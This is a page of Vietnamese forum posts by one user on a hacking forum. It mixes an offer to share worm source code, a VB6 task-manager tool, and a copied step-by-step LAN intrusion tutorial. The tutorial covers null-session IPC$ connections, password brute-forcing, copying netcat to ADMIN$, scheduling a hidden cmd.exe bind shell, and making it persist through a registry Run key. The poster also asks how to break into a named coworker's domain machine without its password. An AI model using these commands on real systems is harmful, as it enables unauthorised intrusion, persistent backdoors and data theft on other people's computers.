banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: ngochoan2003  XML
Profile for ngochoan2003 Messages posted by ngochoan2003 [ number of posts not being displayed on this page: 0 ]
 
Chài !
Bạn đã đọc một bài tui post mã nguồn một con virus lên chưa !
Chưa kịp comment gì thì đã bị hide luôn rùi !
Đã gọi mà Source code mà pác [color=red]posiden[\color] còn bảo là EXE !
YM mình không Online ! nếu bạn dùng GoogleTallk thì OK.
GT: trinhngochoan@gmail.com
thế nhé.
Em mà post lên thì lại hide ngay.
Hay là cắt từng phần lên cho nó ngầu nhỉ ???
Ai kô biết diệt Virus mà kô cần dùng phần mềm AV thì người đó thuộc hàng siêu gà về diệt virus
Pó tay !!! smilie Hãy đọc lại tiêu đề của mình đi :
Diệt các loại Virus mà kô cần dùng các chương trình AV Híc !!! smilie)
Tui định công bố thêm một mã nguồn con Worm có chức năng xóa các file theo qui định mà mình yêu cầu ( trong mã nguồn nó xóa khoảng 7 định dạng và mình có thể Edit nó thành các kiểu )
Tự lây lan, tự đăng ký Start, Tự thay đổi Program chạy nó khi ra mở các định dạng file *.txt
Tóm lại là có đầy đủ các đặc tính của một con Worm.
Code viết bằng VB 6.0
PM: Bác ADMIN có cho em post lên không để em còn biết không lại Hide mất. :?smilie

tmd wrote:
Kẻ xấu nhiều quá. Sử dụng "học" để che dấu cho các mục đích không tốt . Hide là phải, kêu ca gì nửa. 

Xin cho tui nó thẳng nhé :
Về đoạn code mà tui post lên đây không phải ai cũng có thể hiểu được nó. Cho dù bạn có thể Copy nó nhưng chắc gì bạn đã hiểu chạy như thế nào smilie !
Cả nhà dùng song không cho ý kiến gì hả ?
Góp ý vài câu cho nó Pro tí !!!

posiden wrote:
con virus này không có tên nhất định,nó sao chép tên thư mục chứa nó...
bạn mở process ra sẽ thấy có một con msoffice gì đó đang chạy,dù bạn không có mở chương trình nào của office cả,chờ gì nữa,kill nó đi
vào thư mục system32,kiếm xem có file đó không,có bạn nhận ra liền, vì nó là 1 file exe nhưng có icon là thư mục.tốt nhất nên chỉnh folder option để nhìn thấy file ẩn và nhìn thấy phần mở rộng file.sau đó nhấn Window + F, tìm *.exe,thấy cái nào cứ xóa hết.
rùi sau đó đừng đút usb của ai vào nếu không tin tưởng nữa,và đừng chạy bất cứ file exe nào
 

Cho tui thêm ý kiến này :
theo tui được biết thì hiện nay các con Worm + ... đã bổ sung thêm tính năng khóa Folder Option + TaskManager+ Msconfig+Regedit nên làm theo cách của bạn có lẽ khó thực hiện được.
OK !
tui đọc các pác post các quan điểm của mình về các loại "Virus + ..." khủng quá .
nhưng theo tui thì có ý kiến sau :
- Nói về con EXE hình thư mục ( tiêu biểu là con W32.Catch.Worm ) đơn giản là nếu bạn không Run nó thì nó cũng không tự lây nhiễm được. Nhưng đối với Worm mà chức năng chỉ có thế thì soàng thế quá. Vì vậy nó sẽ không cần bạn phải run nó mà nó tự run luôn ! và bằng cách nào thì các bạn tự tìm hiểu vậy.
- Nếu không cần dùng một soft AV nào mà có thể kill hết được bọn Worm + ... thì có nghĩa là tập đoàn viết phần mềm của các hãng như Kav, Nav, Bit, Fscure... tuyên bố phá sản mà điều này khó có thể sảy ra.

Tóm lại :
Nếu không dùng các phần mềm AV để kill bọn này mà diệt thông qua kinh nghiệm của người sử dụng thì --> con này thuộc hàng GÀ . smilie
đoạn mã của bạn cũng khá hay nhưng không thể run được khi mà máy tính đang nhiễm Virus. Mã lệnh của bạn chỉ Set lại home page, và bỏ mấy từ khóa trong RegEdit nhưng không thể Run Regedit được vì Virus đang chạy và nó lại sẽ khóa như thường.
Tool mà mình viết là thay thế 2 công cụ Taskmanager và RegEdit mà.

Tui post lên mã nguồn của chương trình RegEdit cho mọi người tham khảo luôn. Phần này hơi khó nên tui đưa link để mọi người load về tự nghiên cứu nhé.
http://files.myopera.com/ngochoan2006/files/RegEdit.zip
Bác nói như thế thì có chúa mới giúp được bác thôi !!!
Trước hết bác phải mô tả sơ lược về hoạt động của Virus thì mọi người mới có thể góp ý kiến cho bác được chứ.
01. Nó copy tài liệu ( File ) gì sang USB ?
02. Tại sao nói là không dừng lại được ? ( Có nghĩa là gì, không tắt USB được hay là như thế nào )
Thế nhé !
Nếu không cho anh em đọc Code thì sao mà biết cách chúng hoạt động kiểu gì ???
Muốn diệt loại Worm tương tự thì làm như thế nào.
Mà theo tui nghĩ là nếu ai đó dựa vào code mà design nó thành một biến thể khác thì họ hoàn toàn hiểu được mình đang làm gì và sẽ chịu trách nhiệm trước hành động của mình.
Các bác Hide hết luôn thế thì anh em khó học hỏi lắm.
Mà nhiều người đọc còn không hiểu mà ! *_*
Hic lại bị Hide rùi hả !
Tui Post mã nguồn của chương trình Taskmanager trước nhé :
Chương trình cần 1 Module và 1 Form ( thêm một form About nếu thích smilie )
Code trong Module :
Option Explicit

Public Const TH32CS_SNAPPROCESS As Long = 2&

Public Const MAX_PATH As Integer = 260
Public Const PROCESS_TERMINATE = &H1

Public Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type

Public Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias _
"CreateToolhelp32Snapshot" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long

Public Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" _
(ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long

Public Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" _
(ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long

Public Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Public Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long


Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function ReleaseCapture Lib "user32" () As Long
Public Const HTCAPTION = 2
Public Const WM_NCLBUTTONDOWN = &HA1


'--------------------------------------------
Public Const GWL_EXSTYLE = (-20)

Public Declare Function SetWindowLong Lib "user32" _
Alias "SetWindowLongA" (ByVal hwnd As Long, _
ByVal nIndex As Long, ByVal dwNewLong As Long) As Long

Public Declare Function GetWindowLong Lib "user32" _
Alias "GetWindowLongA" (ByVal hwnd As Long, _
ByVal nIndex As Long) As Long

'--------------------------------------------------

Public Declare Function SetLayeredWindowAttributes Lib "user32" _
(ByVal hwnd As Long, ByVal crKey As Long, _
ByVal bAlpha As Integer, ByVal dwFlags As Long) As Long

Public Const WS_EX_LAYERED = &H80000
Public Const LWA_COLORKEY = &H1
Public Const LWA_ALPHA = &H2


Public Function SetWindow(hwnd As Long, crKey As Long, _
bAlpha As Integer, dwFlags As Long) As Long
Dim ExStyle As Long
Dim i As Integer
Dim result As Long
'thay doi ExStyle cua form
ExStyle = GetWindowLong(hwnd, GWL_EXSTYLE)
ExStyle = ExStyle Or WS_EX_LAYERED
SetWindowLong hwnd, GWL_EXSTYLE, ExStyle

result = SetLayeredWindowAttributes(hwnd, crKey, bAlpha, dwFlags)
SetWindow = result
End Function


Code trong form :
Option Explicit

Private Sub Command1_Click()
Dim hSnapShot As Long
Dim uProcess As PROCESSENTRY32
Dim r As Long
List1.Clear
List2.Clear
hSnapShot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
If hSnapShot = 0 Then Exit Sub
uProcess.dwSize = Len(uProcess)
r = ProcessFirst(hSnapShot, uProcess)
Do While r
List1.AddItem uProcess.szExeFile
List2.AddItem Str$(uProcess.th32ProcessID)
r = ProcessNext(hSnapShot, uProcess)
Loop
Call CloseHandle(hSnapShot)
End Sub

Private Sub Command2_Click()
Dim X As Long
Dim th As Long
If List1.ListIndex <> -1 Then
X = CInt(List2.List(List1.ListIndex))
If X > 0 Then
'MsgBox Str$(x)
th = OpenProcess(PROCESS_TERMINATE, False, X)
TerminateProcess th, 0&
Command1_Click
End If
End If
End Sub

Private Sub Command3_Click()
Unload Me
End Sub

Private Sub Command4_Click()
about1.Show
End Sub

Private Sub Form_Load()
Command1_Click
Label1.Caption = " Ch­¬ng tr×nh Task Manager ®­îc viÕt bëi Ngäc Hoµn dùa trªn ng«n ng÷ VB 6.0 chuyªn dïng ®Ó diÖt Virus "
App.TaskVisible = False
SetWindow Me.hwnd, &HFF00FF, 0, LWA_COLORKEY

End Sub

Private Sub Form_MouseDown(Button As Integer, Shift As Integer, X As Single, Y As Single)
ReleaseCapture
SendMessage Me.hwnd, WM_NCLBUTTONDOWN, HTCAPTION, 0
End Sub

Private Sub Label1_Click()

End Sub

Private Sub Timer1_Timer()
Label1.Caption = Right(Label1.Caption, Len(Label1.Caption) - 1)
If Label1.Caption = "" Then
Label1.Caption = " Ch­¬ng tr×nh Task Manager ®­îc viÕt bëi Ngäc Hoµn dùa trªn ng«n ng÷ VB 6.0 chuyªn dïng ®Ó diÖt Virus "
End If

End Sub
Trong Form có 4 Command,2 Listbox và 1 Timer ( Thêm 1 lable để quảng cáo )
Vậy hén ! có gì thắc mắc thì post lên đây .

Look2Me wrote:
Ủng hộ NoHat! Tớ cũng chỉ thích bàn luận đến các vấn đề kỹ thuật thôi. Gét cái bọn chưa chắc biết cái gì copy vài cái code vớ vẩn ra show hàng. 

Ông nói thế ý gì đây ?
Ông muốn bàn luận đến các vấn đề kỹ thuật hả ? vậy tôi hỏi ông biết gì về "Kỹ thuật" của Virus chưa ? ông thử "Show" hàng lên cho anh em học hỏi nào !

delua wrote:

ngochoan2003 wrote:
Các bác bảo là VB6 không thể viết được Virus hả ?
Có dám chắc không ? Tui khẳng định VB có thể làm tất cả thậm chí viết luôn được cả Worm luôn. Có tin không ? 


Việc đầu tiên cần làm là đọc thật kỹ bài viết của anh Hoàngsuy ngẫm bài viết của bác hackernohat.

Chưa ai nói VB không viết được virus và cũng chưa ai khẳng định VB có thể làm được tất cả.
 

:lolsmilie thế hả !
Thế bạn đã đọc kỹ chưa ?
Ý kiến của hackernohat thì OK rất đúng, Hoàng cũng vậy nhưng tôi chỉ muốn nói ở đây là ngôn ngữ lập trình nào cũng có thể viết được Virus. Chỉ có điều là khó hay dễ thôi.
Các bác bảo là VB6 không thể viết được Virus hả ?
Có dám chắc không ? Tui khẳng định VB có thể làm tất cả thậm chí viết luôn được cả Worm luôn. Có tin không ?
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
2 Tool này tui viết trên VB nếu bác nào cần Source của nó tui gửi cho.
Tui thấy mấy con Virus hiện nay thường có kiểu khóa mấy các tool của windows là RegEdit và Msconfig thêm luôn TaskManager để mình không thể Kill nó đang chạy hay xóa nó không cho khởi động cùng windows.
Vì thế tui viết 2 tool này để các bác kill cho nó chết luôn ( Phần mềm người Việt smilie) ) khỏi phải dùng phần mềm nước ngoài .
Các bác dùng thử và cho ý kiến.
<a href="http://files.myopera.com/ngochoan2006/files/Tool_Kill_Virus.zip">
Tai ve </a>
File khóa hoặc mở khóa Home page : http://files.myopera.com/ngochoan2006/files/Khoa_Mo%20homepage.vbs
Tui có mã nguồn con này bằng Asem có bác nào cần mã nguồn của nó để nghiên cứu học hỏi không ?
Em đang Decode mã file EXE của nó viết bằng Autoit nhưng không biết pass !!! smilie-)) Bác nào biết pass của nó không chỉ cho em với !
tôi thấy các bác cũng chưa thể thâm nhập vào một máy trong Lan mà không biết Pass !
Các bác đã bao giờ exploit một lỗi nào của XP chưa ???
Các bác hãy load thử phần mềm này về nghiên cứu xem sao nhé :
http://www.metasploit.com/projects/Framework/msf3/download.html?Release=framework-3.0-beta-3-svn.exe
cho tôi hỏi một chút, hiện nay tôi đang dùng XP SP2 nối mạng Lan thông qua một Domain.
Tôi cũng thử làm như các bạn nói truy cập tài nguyên của máy khác thông qua Share Default ( C$, D$ ) nhưng có một khó khăn như sau :
Target Computer : tran_van_A, Trong Domain : Domain.com.vn ( ví dụ thế, tên Domain thật tui không muốn nói ra ), tôi ngồi tại máy B của tôi gõ lệnh : Start\CMD\Net use p: \\tran_van_A\d$ Enter
Nó hiện lên : Enter user name for tran_van_A : tại đây tui đánh : tran_van_A
nó hiện tiếp: Enter Password for tran_van_A : Tui để trống

Nhưng không truy cập vào được ( tui đã thử User name : tran_van_A\administrator và Pass là trắng nhưng vẫn không được ).
Vậy có bác nào có cách vào máy đó được không ??? thông qua các Port 139 hay 445 gì gì đó ?
OK !
Một bài viết hay nữa nè !
Hacking thông qua resource share:

Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …)
Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn.
Chỉ bằng vài dòng lệnh đơn giản trên comand line:



CODE

[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

Shared resources at \\x.x.x.x

Share name Type Used as Comment
-------------------------------------------------------------------------------
C Disk
PRJA3 Disk
The command completed successfully.
C:\>



Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?).
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.
Cũng bằng command line:


CODE


C:\> net use z: \\x.x.x.x \share
The command completed successfully.



Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password
Lấy Username :


CODE


C:\> Nbtstat –A x.x.x.x

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ADMIN <00> UNIQUE Registered
BODY <00> GROUP Registered
ADMIN f <20> UNIQUE Registered
BODY <1E> GROUP Registered
BODY <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-08-A1-5B-E3-8C



Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt


CODE


“” ADMIN
123456 ADMIN
123456 BODY
“” BODY



Sau đó hacker crack bang lệnh :
[/CODE]Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:


CODE


C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt



Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới IPC$ ( mặc định share của windows)


CODE


C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.

Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:


CODE

C:\> net use \\x.x.x.x\IPC$ “” /user:””
The command completed successfully

Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao )

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:
giờ thiết lập 1 phiên làm viêc:



CODE

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.



Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc)
chép nc vào máy victim



CODE

C:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)



CODE

C:\> sc \\x.x.x.x start schedule
service_name : schedule


Bây giờ kiểm tra giờ trên máy victim



CODE

C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully.



Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:



CODE

C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe

Added a new job with job ID = 1

đợi đến 4:55 rồi chạy thử nc.exe



CODE

C:\>nc –nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\windows>


Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’)
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?
Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:



CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"


Sau đó copy sang máy victim và chạy nha!

Bài viết này tui copy lại Post để nọi người tham khảo, kiến thức này không phải là do tôi viết ra. ( hình như của bác ZENO thì phải cũng trong HVA của mình đấy )
Em xin Copy lại một bài viết của một thành viên trong một diễn đàn Hack, tuy rằng họ không nói nhiều như mấy bác bên này nhưng ít ra họ còn nói cho em biết chút ít, mấy bác đọc thử nhé :
" Tôi xin trình bày những bước cơ bản để bạn đột nhập một mạng LAN. Ngoài các tool thông dụng ra, nhưng không phải lúc nào bạn cũng có tool bên cạnh hoặc có thể cài đặt nó thành công được. Sau đây tôi trình bày những bước căn bản có sai xót gì các bác trao đổi thêm.
1- Kiểm tra IPC share: IPC viết tắt của Inter-Process Communication, được dùng trong việc chia sẻ dữ liệu giữa các ứng dụng và máy tính trên mạng
(NT/2K). Khi một máy được khởi động và log vào mạng, hdh sẽ tạo 1 chia sẻ ngầm định tên là IPC$. Nó sẽ giúp cho các máy khác có thể nhìn thấy và kết nối đến các chia sẻ trên máy này. Tuy nhiên, có thể vì một lý do gì đó, người dùng xóa mất IPC$ share, do đó, ta cần kiểm tra và tạo lại kết nối đến
IPC$ (gọi là null connection), nếu kết nối thành công, ta có thể thấy được cả các chia xẻ đặc biệt được ẩn (bao gồm C$, ADMIN$, IPC $, IPC$). Cụ thể, dùng 1 trong 3 lệnh sau ở command prompt:
C:\>NET USE \\TARGET\IPC$ "" /USER:""

C:\>NET USE \\TARGET\IPC$ * /USER:

C:\>NET USE \\TARGET\IPC$ * /USER:""
trong đó: target là computername hoặc IP của máy bạn muốn kết nối. Lưu ý, các chia xẻ có dấu $ phía sau tên chỉ ra rằng chia xẻ đó được ẩn và cách này chỉ áp dụng khi cổng NetBios 139 của máy bạn và máy đích được mở.
Thường là đối với chia xẻ dạng này, bạn sẽ ít có cơ hội khai thác được gì. Tuy nhiên, nếu may mắn, bạn vẫn có thể khai thác được trong trường hợp các chia xẻ đó không yêu cầu mật khẩu.
Kế đến, bạn dùng lệnh sau để xem các chia xẻ thấy được:
C:\>net view \\TARGET
Lệnh net view sẽ liệt kê danh sách các share của máy đích. Bạn dùng net view /? để biết thêm các cách dùng khác.
Sau khi tạo được null connection và biết được các share trên máy đối phương. Ðối với các share được bảo vệ bằng username/password, bạn có thể dùng các tool sau để thử crack chúng: Nat (NetBIOS Auditing Tool)...
Ðể tiết kiệm thời gian, bạn tìm và dùng thử chương trình xSharez scanner, cũng có thể cho bạn kết quả tương tự.
2- Kiểm tra các cổng mở
Một cách khác để connect vào một máy là duyệt các port mở của máy đích. Tuỳ loại port mà ta có cách thức khai thác khác nhau, đơn giản nhất là dùng telnet để connect vào máy thông qua port được mở, ví dụ:
C:\telnet phatom 69
Một số port thông dụng:
21: FTP
23: Telnet proxy server
25: SMTP
110: POP3
139: NETBIOS
1080: SOCKS proxy
6667: IRC mapping
.....
Các công cụ để scan port có rất nhiều, ví dụ như: superscan, elite, .... – Các bạn đọc có thể vào phần công cụ Learning hacking For Viet để tài về. Sau khi scan được port nào đang opened, nếu port đó ngoài những port trên, bạn thử dùng telnet để connect, nếu thành công, bạn có thể vào command prompt shell của máy đó.
3- Kiểm tra các lổ hổng của OS/Software
Cách cuối cùng tớ nói ở đây, cũng là cách khó nhất là duyệt xem máy đó đang dùng OS gì, server gì, software nào. Mỗi loại trên có các hole/vulnerability riêng, được tìm thấy và mô tả chi tiết trong các site về security như ntbugtraq, securityfocus, hoặc trong forum.
Từ những lổ hổng biết được, ta sử dụng các exploit tương ứng để thâm nhập vào máy.
Lỗi sơ đẳng nhất trong các system software là lỗi về cách đặt password, ví dụ như các máy Wins 9x có thể vào mà không cần password (tất nhiên là khi đó, người log vào sẽ bị hạn chế truy cập các tài nguyên mạng); hoặc như với NT/2K, sau khi setup, password ngầm định của adminnistrator là rỗng, nếu user không thay đổi pass cho admin, thì ta có thể connect remote được dưới username là administrator mà không cần pass.
Các lỗi còn lại thường là do các sai sót trong quá trình viết chương trình mà vô tình tạo nên những lỗ hổng, các đoạn code kiểm tra không đầy đủ, không stable...cho phép người dùng thực thi các lệnh, chạy các chương trình từ xa. Ví dụ như bug Unicode encoding của IIS4... Và cách thường dùng để nhập là tìm cách send 1 trojant/backdoor (điển hình như Netcat...) đến máy đó, chạy backdoor đó để mở 1 port nhất định nào đó, rồi ta sẽ connect remote vào port đó. "

Đấy đâu phải không có cách để đột nhập vào máy trong mạng Lan đâu >
Ngoài ra thì còn rất nhiều cách nữa đấy.
Sao không thấy cao thủ nào tiếp chiêu thế ?
Toàn thấy bàn chuyện cướp Domain hay hack Host mà quên mất việc làm thể nào để hack local computer sao ?
Chỉ giúp, hướng dẫn anh em với chứ !
Đương nhiên là chuyện Recover Pass của thằng XP là xương rùi nên tui mới Post bài này nên để các cao thủ thể hiện tài năng của mình, chứ còn dễ như kiểu recover pass của bọn Office thì ai mà chả làm được. Mục đích chính khi tôi Post bài này lên là làm thế nào để có thể truy cập vào một máy khác ở ngang quyền với mình trong mạng lan, và truy cập bằng mọi cách, tìm pass là một cách cổ điển nhất ngoài ra còn vô số các cách khác khau. Ví dụ như các cao thủ thì có thể truy cập vào máy của Victim thông qua lỗi tràn Stack trong dịch vụ LSA ( lsass.exe ) chẳng hạn. Đấy là ý chính mà tôi mong muốn được học hỏi ở đây, còn mấy cái chuyện bàn lùi như là bỏ ý định tìm pass hay gì gì đấy thì chán chết !
Ngay đầu đề của tip này là " Thảo luận thâm nhập" cơ mà.
Hãy đưa ra những kiến thức ý tưởng của mình, hay những tài liệu mà bạn có trong tay về thâm nhập để từ đó mình sẽ có kiến thức sâu hơn về lĩnh vực này.
lQ nói thì có vẻ am hiểu máy tính ghê gớm lắm nhỉ!
Xin cho hỏi một câu là bác đã từng sử dụng chương trình ENT3 bao giờ chưa ?
Chắc là chưa biết nó là cái gì đúng không ?
Bởi vì nếu đã dùng qua nó thì chắc hằn bác không bảo là không <b> "quên chuyện dò password Window" </b>.
He he he !
Nếu chưa từng dùng wa chương trình đó thì bác mau Download nó về và chạy thử đi nhé, sau đó mới phát biểu là có phần mềm nào dò Pass và Use của Windows không nhé, tiện thể tiết lộ cho bác biết luôn một điều với phần mềm ENT bác có thể dò Pass không giới hạn độ dài đâu và tui đã thử một Pass có độ dài khoảng 14 ký tự mất khoảng chưa đầy 2 phút !!!.
Pó tay toàn phần !!!

Chẳng nhẽ không ai biết Hack cái đơn giản như thế này sao ???
 
Go to Page:  First Page Page 2 Page 4 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|